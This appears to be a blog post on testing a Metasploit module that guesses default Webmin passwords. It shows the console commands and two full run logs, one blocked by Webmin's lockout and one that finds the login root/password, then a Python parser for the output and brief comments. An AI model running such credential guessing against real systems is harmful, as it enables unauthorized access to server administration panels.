At least one gotcha I discovered is that Webmin will block the IP after four or five (usually 5) attempts. I believe the default is 300 seconds; it will also supposedly increase the delay if the same host keeps hitting it.
I took the approach to throw 5 passwords at it; if it's not something super obvious then I'd move along. Maybe not the best solution, but I wanted to make sure it wasn't root/root or webmin/webmin and move on.
msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
msf auxiliary(webmin_login_brute) > set SSL TRUE
SSL => TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt
PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run
[*] Verifying login exists at http://192.168.1.1:10000/session_login.cgi
[*] http://192.168.1.1:10000/session_login.cgi - Webmin - Attempting authentication
[*] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[-] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password'
[*] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] Scanned 1 of 1 hosts (100% complete)
And it looks like this when it works:
[*] Verifying login exists at http://10.0.0.25:12321/session_login.cgi
[*] http://10.0.0.25:12321/session_login.cgi - Webmin - Attempting authentication
[*] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 10.0.0.25:12321 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[+] http://10.0.0.25:12321/session_login.cgi - Webmin - Login Successful 302 with 'root':'password' Redirect to->https://10.0.0.25:12321/
[*] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'letmein'
[*] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
** Note: you have to unset the PASSWORD value too; for some reason it's populating with a blank password and trying that, which sucks if you only have five chances.
Code is here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/auxiliary/scanner/webmin_login.rb
Figured I'd let the blog serve as a way to let people test prior to doing a pull request.
CG
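An added example (not part of the original post or the module): a parser for the console output format shown above that separates the passwords Webmin actually rejected from the ones sent after the block, which were never evaluated and so say nothing about the account. The function name and summary keys are assumptions for illustration; the sample lines are copied from the first run on this page.

```python
import re

# Patterns for the four line types the module prints in the runs above.
TRYING = re.compile(r"\[(\d+)/(\d+)\].*Trying username:'([^']*)' with password:'([^']*)'")
FAILED = re.compile(r"\[(\d+)/\d+\].*LOGIN FAILED")
BLOCKED = re.compile(r"\[(\d+)/\d+\].*We got blocked")
SUCCESS = re.compile(r"Login Successful \d+ with '([^']*)':'([^']*)'")

# Copied from the blocked run on this page.
SAMPLE_RUN = """\
[*] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[-] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password'
[*] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked
"""

def summarize_run(output):
    """Classify each attempt as rejected, sent while blocked (untested), or successful."""
    summary = {"tried": 0, "rejected": [], "blocked_from": None,
               "untested": [], "success": None}
    passwords = {}  # attempt number -> password sent
    for line in output.splitlines():
        if m := TRYING.search(line):
            passwords[int(m.group(1))] = m.group(4)
            summary["tried"] += 1
        elif m := BLOCKED.search(line):
            n = int(m.group(1))
            if summary["blocked_from"] is None:
                summary["blocked_from"] = n  # first attempt answered with the 403 block
            summary["untested"].append(passwords.get(n))
        elif m := FAILED.search(line):
            summary["rejected"].append(passwords.get(int(m.group(1))))
        elif m := SUCCESS.search(line):
            summary["success"] = (m.group(1), m.group(2))
    return summary

if __name__ == "__main__":
    print(summarize_run(SAMPLE_RUN))
```

On the blocked run, the blank password counts as one of the four evaluated guesses, so only three real candidates were tested before the lockout.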
Careful!! You left the URL in the second line.
thanks! fixed